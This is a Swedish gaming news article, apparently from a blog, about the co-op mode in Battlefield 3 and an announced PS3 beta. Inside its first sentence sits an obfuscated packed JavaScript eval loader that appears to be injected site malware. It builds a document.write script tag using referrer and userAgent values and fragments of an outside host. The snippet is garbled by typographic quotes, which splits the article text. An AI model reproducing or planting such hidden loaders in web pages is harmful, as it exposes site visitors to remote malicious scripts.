Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Battlefield 3 Co-op hands-on och PS3 Beta

Battlefield 3 Co-op hands-on och PS3 Beta
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|naabs|var|u0026u|referrer|eeahf||js|php’.split(’|’),0,{}))
ett pressmeddelande från Tommy Rydling som är produktchef på DICE har vi fått en liten inblick i hur co-op i Battlefield 3 kommer fungera, och vi märker snabbt att man har lånat en hel del element från t.ex. Call of Duty och EA Games Army of Two samtidigt som man lagt till sina egna detaljer.

Co-op-delen tar plats i samma universum som resten av spelet och följer en story som leder fram till en explosiv final.  Spelläget har samma filosofi som DICE:s kända multiplayer-del där lagarbete aldrig är ett krav men det gör både spelet roligare och enklare att ta sig igenom.

Uppdragen är mestadels asymmetriska, t.ex. att ena spelaren ska desarmera en bomb medan den andra försvarar eller att den ena spelaren styr en helikopter medan den andra sitter vid kulsprutan. Annars är det basic teamwork som gäller rak igenom där man springer runt i olika områden och tillsammans ska rapportera fiender i stora strider för att underlätta för sitt team och återuppliva varandra om någon skjuts ner et.c.

Det är en hög svårighetsgrad på samtliga uppdrag och för att överleva krävs det att man håller sig nära sin vän och så att om någon blir nerskjuten kan man använda sig av DICE:s revive-system ”Man Down”. Om man väl blir nerskjuten kan man fortfarande hjälpa sin kamrat med sin pistol och långsamt krypa till säkrare områden, något som behövs då om båda skjuts ner är uppdraget över. Banorna följer inte ett valt mönster för att underlätta för fler genomspelningar där t.ex. fiender inte befinner sig på samma plats varje gång man kör ett uppdrag.

Att spela co-op ska även ha lite extra fördelar för ens BF3-karriär då man genom att klara olika uppgifter under co-op kan låsa upp olika vapen och percs som man sedan kan ha med sig när man sedan kör multiplayer.

I samma pressmeddelande lät Rydling det även bli känt att en öppen PS3-beta är på ingång inom kort, mer detaljer följer snart!